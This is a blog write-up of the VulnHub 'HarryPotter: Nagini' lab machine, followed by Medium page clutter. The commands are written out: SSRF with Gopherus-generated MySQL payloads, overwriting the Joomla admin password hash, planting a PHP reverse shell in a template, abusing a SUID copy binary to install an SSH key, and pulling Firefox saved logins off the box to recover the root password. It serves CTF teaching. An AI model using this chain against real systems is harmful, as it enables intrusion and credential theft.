VulnHub: HarryPotter: Nagini

Today we will take a look at Vulnhub: Nagini. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open — open 192.168.0.110

  • Gobuster

Command: gobuster dir -u http://192.168.0.110 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt

We found an directory here: note.txt

Hello developers!!

I will be using our new HTTP3 Server at https://quic.nagini.hogwarts for further communications.
All developers are requested to visit the server regularly for checking latest announcements.

Regards,
site_admin

Here we see the word http3, let’s research.

Let’s download and setup.

Command: git clone — recursive https://github.com/cloudflare/quiche

Command: cargo build — examples

Command: cd target/debug/examples

Command: ./http3-client https://192.168.0.110/

<html>
<head>
<title>Information Page</title>
</head>
<body>
Greetings Developers!!

I am having two announcements that I need to share with you:

1. We no longer require functionality at /internalResourceFeTcher.php in our main production servers.So I will be removing the same by this week.
2. All developers are requested not to put any configuration’s backup file (.bak) in main production servers as they are readable by every one.

Regards,
site_admin
</body>
</html>

When we look at the /internalResourceFeTcher.php extension, we see a button. When I thought it was a command injection, it didn’t work. I doubted it was ssrf. For this I wrote 127.0.0.1 and the result:

We also found the /joomla extension. The .bak file can be found here. Let’s check

Command: joomscan -u http://192.168.0.110/joomla/

[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.9.25

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.0.110/joomla/administrator/components
http://192.168.0.110/joomla/administrator/modules
http://192.168.0.110/joomla/administrator/templates
http://192.168.0.110/joomla/tmp
http://192.168.0.110/joomla/images/banners

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.0.110/joomla/administrator/

[+] Checking robots.txt existing
[++] robots.txt is found
path : http://192.168.0.110/joomla/robots.txt

Interesting path found from robots.txt
http://192.168.0.110/joomla/joomla/administrator/
http://192.168.0.110/joomla/administrator/
http://192.168.0.110/joomla/bin/
http://192.168.0.110/joomla/cache/
http://192.168.0.110/joomla/cli/
http://192.168.0.110/joomla/components/
http://192.168.0.110/joomla/includes/
http://192.168.0.110/joomla/installation/
http://192.168.0.110/joomla/language/
http://192.168.0.110/joomla/layouts/
http://192.168.0.110/joomla/libraries/
http://192.168.0.110/joomla/logs/
http://192.168.0.110/joomla/modules/
http://192.168.0.110/joomla/plugins/
http://192.168.0.110/joomla/tmp/


[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config file is found
config file path : http://192.168.0.110/joomla/configuration.php.bak

Let’s download the .bak file and look at its contents.

The part we need:

public $dbtype = ‘mysqli’;
public $host = ‘localhost’;
public $user = ‘goblin’;
public $password = ‘’;
public $db = ‘joomla’;
public $dbprefix = ‘joomla_’;

We found ssrf here. Now we have a database. We will use this vulnerability to view and make changes to the database data.

Therefore, we will use this tool

Command: git clone https://github.com/tarunkant/Gopherus.git

Command: python2 gopherus.py — exploit mysql

Let’s enter the data.

We get it after pasting it on the button.

Now we will get more detailed information.

I tried to crack hash here. But i can’t. Therefore, I will check the update.

Command: use joomla;update joomla_users set password=’5f4dcc3b5aa765d61d8327deb882cf99'where username=’site_admin’

Here is the password changed. Let’s log in as an administrator.

Get reverse shell

Extensions — >Templates — >Protostar — > New File

Change your ip address and get a paste. Then go to this directory.

Url- http://yourip/joomla/templates/protostar/rev.php

After entering

Command: script /dev/null -c bash

Command: export TERM=xterm

  • Snape

Command: cd /home/snape

Command: cat .creds.txt

Decode with Base64

Pass: Love@lilly

Command: su snape

  • Hermiona

Command: ssh-keygen -f hermoine

Command: python3 -m http.server 80

In target

Command: cd /home/snape/

Command: wget http://192.168.0.107/hermoine.pub

Command: mv hermoine.pub authorized_keys

Command: chmod 640 authorized_keys

Command: cd /home/hermoine/bin/

Command: ./su_cp -p -r /home/snape/authorized_keys /home/hermoine/.ssh/

  • Ssh

Command: ssh hermoine@192.168.0.110 -i hermoine

  • Root

There was a .mozilla folder in the Hermione folder. When I looked inside the folders, I was confronted with such information.

command: cd /home/hermoine/.mozilla/firefox/g2mhbq0o.default

key4.db

logins.json

I need to transfer these two files to my local machine to crack the passwords.

Command: python3 -m http.server

I will use this tool to break it.

Command: git clone https://github.com/lclevy/firepwd/

Command: sudo pip install -r requirements.txt

After uploading two files from the target machine, start the tool.

Command: python firepwd.py

Here we found the root password

Command: su root

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Guide to Multithreading Annotations in Java

Clojure, specs and data correctness

Secure access Google Cloud Ressources

5 Python Books to Transfer Your Code to The Next Level

Business agility: An agile approach beyond IT

Business Agility

Google Analytics 4: Migrating From Universal Analytics (GA4)

Replace the Linux Console Login with something Different.

Colorful multi-panel display of CPU, Memory, Storage and Networking statistics.

Monolith vs Microservices.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

TryHackMe: Gallery

CyberHeroes | TryHackMe | WriteUp | MZS

Net Sec Challenge Try Hack Me Jr. Penetration Tester Path

Hack the Box: Blue — Writeup (Without Metasploit)